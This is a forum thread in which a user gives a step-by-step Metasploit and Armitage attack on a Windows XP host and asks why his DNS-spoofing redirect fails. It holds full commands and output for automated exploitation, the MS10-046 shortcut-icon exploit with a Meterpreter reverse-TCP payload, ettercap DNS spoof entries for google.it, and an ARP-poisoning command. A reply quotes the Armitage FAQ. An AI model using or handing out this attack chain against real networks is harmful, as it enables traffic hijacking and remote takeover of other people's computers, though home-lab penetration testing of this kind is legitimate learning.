Thread: Backtrack vs Windows (Metasploit and DNS spoofing problem)

  1. #1
    Just burned his ISO
    Join Date: Oct 2011
    Posts: 2

    Backtrack vs Windows (Metasploit and DNS spoofing problem)

    Hi guys, I hope that one of you can help me with an exploit of Armitage on BackTrack 5 R1 32 bit (virtual machine).
    I opened this thread because I didn't find a manual or another thread on the websites.
    I want to know which problem my Armitage has and why I cannot attack the target.
    Armitage has been started, but there are warning messages and I don't like this.
    I write it step by step:

    BACKTRACK IP 192.168.1.6
    TARGET IP 192.168.1.8


    1. STEP

    root@bt:~#/etc/init.d/mysql start

    Rather than invoking init scripts through /etc/init.d, use the service(8)
    utility, e.g. service mysql start

    Since the script you are attempting to invoke has been converted to an
    Upstart job, you may also use the start(8) utility, e.g. start mysql
    mysql start/running, process 2871

    (I don't see a problem here)

    2. STEP

    root@bt:~#msfrpcd -f -U msf -P test -t Basic
    [*] XMLRPC starting on 0.0.0.0:55553 (SSL):Basic...[*] XMLRPC ready at 2011-10-07 12:06:51 +0200.

    (I don't see a problem here)

    3. STEP

    root@bt:~#armitage

    Warning: /root at preferences.sl:309
    Doing a secure socket!
    Warning: No collaboration server is present! at collaborate.sl:94
    Warning: Writing to: /root at armitage.sl:201

    (Now Armitage has started, but there are these warning messages)

    4. STEP

    Click Hosts ---> Nmap Scan ---> Quick Scan (OS detect)

    I write the IP address of my target:

    192.168.1.8

    Click OK, Nmap starts the scan and when it finishes I see the host.

    (I don't see a problem here)

    5. STEP

    I click on the host and then Attack ---> Find Attacks ---> by port

    When this is complete I see the exploits if I right-click on the target host.

    Attack ---> Hail Mary ---> by port

    When this is complete, Hail Mary reports this:

    1) Finding exploits (via db_autopwn)

    [192.168.1.8] Found 16 exploits

    2) Sorting Exploits

    3) Launching Exploits

    4) Listing sessions

    msf > sessions -v

    Active sessions
    ===============

    No active sessions.

    (Here, the 16 exploits found have not hit the target, but I don't understand the reason)

    6. STEP

    Now I think that if I make a DNS spoofing attack it's good to send the target over to my server "ms10_046_shortcut_icon_dllloader" with payload "windows/meterpreter/reverse_tcp" and...

    Attack ---> Browser Attacks ---> Windows ---> ms10_046_shortcut_icon_dllloader

    use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
    meterpreter > set LHOST 192.168.1.6
    LHOST => 192.168.1.6
    msf exploit(ms10_046_shortcut_icon_dllloader) > set DisablePayloadHandler true
    DisablePayloadHandler => true
    msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVPORT 80
    SRVPORT => 80
    msf exploit(ms10_046_shortcut_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf exploit(ms10_046_shortcut_icon_dllloader) > set TARGET 0
    TARGET => 0
    msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 0.0.0.0
    SRVHOST => 0.0.0.0
    msf exploit(ms10_046_shortcut_icon_dllloader) > set URIPATH /
    URIPATH => /
    msf exploit(ms10_046_shortcut_icon_dllloader) > exploit -j
    [*] Exploit running as background job.
    [*]
    [*] Send vulnerable clients to \\192.168.1.6\PDcC\.
    [*] Or, get clients to save and render the icon of http://<your host>/<anything>.lnk
    [*]
    [*] Using URL: BackTrack Linux - Penetration Testing Distribution
    [*] Local IP: http://192.168.1.6:80/
    [*] Server started.

    OK, now I need to send the target to this address: \\192.168.1.6\PDcC\
    The question is: CAN I USE DNS SPOOFING? I think yes. If "www.google.it" is my address, 192.168.1.6, and he writes Google, he comes over to my server and I take control.

    (I don't see a problem here)

    7. STEP

    I open another shell and:

    root@bt:~#nano /usr/share/ettercap/etter.dns

    And I replace this:

    google.it A 192.168.1.6
    *.google.it A 192.168.1.6
    Google PTR 192.168.1.6

    Then I save and close and I start the DNS SPOOFING:

    root@bt:~# ettercap -T -q -i eth0 -P dns_spoof -M arp // //

    (I don't see a problem here)

    8. STEP

    Check of Armitage:
    [*] Sending UNC redirect to 192.168.1.8:1076 ...

    Check of ettercap text mode:

    dns_spoof: [www.google.it] spoofed to [192.168.1.6]

    Check of the target host's browser:

    Google

    is:

    http://www.google.it/\\192.168.1.6\5CPDcC\

    (The problem here is the bad redirect)

    END...

    I don't understand why the redirect is: http://www.google.it/\\192.168.1.6\5CPDcC\ and whether there are WARNING MESSAGES or other problems that I need to fix. Thanks for your patience.

  2. #2
    Just burned his ISO
    Join Date: Mar 2011
    Posts: 4

    Re: Backtrack vs Windows (Metasploit and DNS spoofing problem)

    You're trying to do a lot of stuff here. I recommend getting it working one step at a time. However, to answer two of your questions (from the Armitage FAQ at http://www.fastandeasyhacking.com/faq ):

    5. I can't get any exploits to work. What am I doing wrong?

    Start with something that you know is exploitable. I recommend downloading the Metasploitable virtual machine. Hacking this will give you confidence that yes, exploits work and yes, you're probably using Metasploit correctly.

    Not all exploits work in all situations. Remember that you're sending code to a system that is meant to trigger a flaw. If a firewall is on, then maybe the data isn't getting to the service. Maybe you're running a version of the software that no longer has the flaw.

    Metasploit is not a magic key into other systems. Knowing what to use in different situations is a skill and it comes with experience.

    7. What are the warning messages in the console I launched Armitage from?

    These are harmless. They're debug output for me to read. I was too lazy to remove them. They always have the form Warning: some message here at file.sl:##. The scary "Warning" text is from the warn function in the language I used to write Armitage. Ignore it.

  3. #3
    Just burned his ISO
    Join Date: Oct 2011
    Posts: 2

    I don't know the reason for these problems... I've seen many videos about Metasploit and it seems easy. I'm a network manager and I know network security, but here it's not school and this job is not available from a teacher!

    5. I've tried all the exploits but not one works.
    7. I open another shell to start ettercap to do DNS spoofing + Metasploit because I cannot redirect the target host to me if I don't spoof. (I don't know other ways)

    I've written all my steps of the attack...

    PS: I make one step at a time; this was all my history of this first attempt to break my home net security. I don't think that this PC is not penetrable because I've installed Windows XP SP3.

    I have news! Metasploit takes control of Windows, but ONLY WITHOUT FIREWALL... I've also tried setting my ettercap to do DNS spoofing, but the webpage is always this:

    http://www.google.it/\\192.168.1.6\5CPDcC\

    This webpage cannot be viewed because there is a syntax error. Can anyone help me redirect the target to \\192.168.1.6\5CPDcC\ and not to http://www.google.it/\\192.168.1.6\5CPDcC\ ?

    My ettercap.dns has been set with this conf:

    google.it A 192.168.1.6
    *.google.it A 192.168.1.6
    Google PTR 192.168.1.6

    Why is the redirect http://www.google.it/\\192.168.1.6\5CPDcC\ ?

    Thanks again!
    Last edited by g0tmi1k; 10-08-2011 at 06:27 PM. Reason: Merged